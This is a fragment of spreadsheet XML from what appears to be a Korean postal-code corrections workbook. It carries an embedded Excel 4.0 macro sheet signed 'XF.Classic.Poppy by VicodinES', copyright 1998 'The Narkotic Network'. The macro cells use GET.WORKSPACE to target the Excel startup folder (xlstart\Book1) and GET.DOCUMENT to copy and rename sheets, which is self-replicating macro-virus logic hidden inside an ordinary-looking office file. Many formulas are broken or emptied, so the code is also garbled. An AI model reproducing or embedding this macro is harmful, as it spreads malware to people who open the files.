        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="9" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="14" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C41" s="14" t="b">
        <f>=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"/>
  <cols>
    <col min="1" max="1" width="29.8515625" style="6" customWidth="1"/>
    <col min="2" max="2" width="1.28515625" style="6" customWidth="1"/>
    <col min="3" max="3" width="32.140625" style="6" customWidth="1"/>
    <col min="4" max="16384" width="9.140625" style="6" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="5" t="s">
        <v>31</v>
      </c>
      <c r="C1" s="6" t="b">
        <f>"XL4Poppy"</f>
        <v>1</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="5" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="7" t="s">
        <v>19</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="7" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="9" t="e">
        <f>C18</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="9" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="9" t="e">
        <f>IF(A4=3)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="10" t="s">
        <v>21</v>
      </c>
      <c r="C7" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C8" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="12" t="s">
        <v>23</v>
      </c>
      <c r="C9" s="9" t="b">
        <f>FALSE</f>
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="11" t="s">
        <v>24</v>
      </c>
      <c r="C10" s="9" t="e">
        <f>A21</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="13" t="s">
        <v>25</v>
      </c>
      <c r="C11" s="9" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>1</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="9" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>1</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="9" t="b">
        <f>,"Poppy",TRUE</f>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="8" t="s">
        <v>26</v>
      </c>
      <c r="C14" s="14" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="9" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>1</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="9" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="14" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C17" s="8" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="9" t="b">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>1</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="9" t="b">
        <f>"Document_array",</f>
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="15" t="s">
        <v>28</v>
      </c>
      <c r="C20" s="9" t="b">
        <f>$A$1INDEX(,2)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="16">
        <f>IF(A3="Book1.",0,99)</f>
        <v>0</v>
      </c>
      <c r="C21" s="9" t="b">
        <f>$A$2INDEX(,1)</f>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="9" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
      <c r="C22" s="9" t="b">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="9" t="b">
        <f>IF(A21=0)</f>
        <v>1</v>
      </c>
      <c r="C23" s="14" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="9" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="9" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C27" s="9" t="e">
        <f>C19</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="9" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C28" s="9" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C29" s="9" t="e">
        <f>IF(A4=3)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="9" t="e">
        <f>C18</f>
        <v>#N/A</v>
      </c>
      <c r="C30" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="9" t="e">
        <f>"XL4Poppy",A1</f>
        <v>#VALUE!</v>
      </c>
      <c r="C31" s="9" t="b">
        <f>FALSE</f>
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="9" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>1</v>
      </c>
      <c r="C32" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="9" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>1</v>
      </c>
      <c r="C33" s="9" t="e">
        <f>C19</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="9" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>1</v>
      </c>
      <c r="C34" s="9" t="e">
        <f>"XL4Poppy",A1</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="9" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>1</v>
      </c>
      <c r="C35" s="9" t="e">
        <f>=</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C36" s="14" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="9" t="b">
        <f>A3</f>
        <v>1</v>
      </c>
      <c r="C39" s="16" t="b">
        <f>"XF.Classic.Poppy"</f>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="9" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C40" s="9" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="14" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C41" s="14" t="b">
        <f>=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우편번호정정사항</dc:title>
  <dc:subject/>
  <dc:creator>황성구</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>우편사업단</cp:lastModifiedBy>
  <cp:lastPrinted>2003-10-22T00:52:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-02-18T07:44:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-10-22T09:46:53Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>